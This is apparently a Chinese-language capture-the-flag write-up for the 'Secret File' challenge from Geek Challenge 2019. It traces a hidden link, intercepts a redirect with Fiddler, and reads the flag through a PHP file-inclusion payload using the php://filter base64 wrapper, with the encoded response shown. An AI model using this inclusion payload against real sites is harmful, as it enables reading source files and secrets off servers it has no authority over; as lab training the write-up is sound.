[极客大挑战 2019]Secret File

题目链接

考点分析

本题考察对网络数据包的拦截，php审计，php伪协议

工具链接

Fiddler Classic 下载

解题步骤

(1) 初探网站

打开网站一片漆黑中间几行红色大字

你想知道蒋璐源的秘密么？
想要的话可以给你，去找吧！把一切都放在那里了！
Syclover @ cl4y

难道暗藏玄机? F12 查看

        
                
                
        

        







            
你想知道蒋璐源的秘密么？




            
想要的话可以给你，去找吧！把一切都放在那里了！
            Oh! You found me
            
 Syclover @ cl4y
        

额哈 /Archive_room.php

(2) 顺藤摸瓜

访问../Archive_room.php网页
网页中有一个鲜红的 SECRET 按钮单机一下
什么?

查阅结束
没看清么？回去再仔细看看吧。

耍我呢？

(3）釜底抽薪

是时候展现我们真正的实力了
上工具Fiddler Classic
再次访问../Archive_room.php网页
轻松找到 action.php 跑过了和尚跑不过庙 终于抓住你了
点开

原来元凶在这 => secr3t.php

(4) 直端老巢

访问 ../secr3t.php
源代码出现

根据提示直接访问..?file=flag.php
可恶又被耍了

啊哈！你找到我了！可是你看不到我QAQ~~~
我就在这里

(5) 决胜时刻

平复一下心情 喝口柠檬水压压惊
重新再看一遍代码 竟没有过滤file
用上一次同样的套路
php://filter"伪协议” 来进行包含 加上read=convert.base64-encode来对文件内容进行编码
构造payload:?file=php://filter/read=convert.base64-encode/resource=flag.php
返回

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7NTdlN2I4YmMtMjA1ZS00MWIyLTk4MTMtMGRmMjY2MDdkNjc4fSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

Base64 解码 得到flag

    
        
        
    

    






        
        
啊哈！你找到我了！可是你看不到我QAQ~~~



        
        

            
        
    

大功告成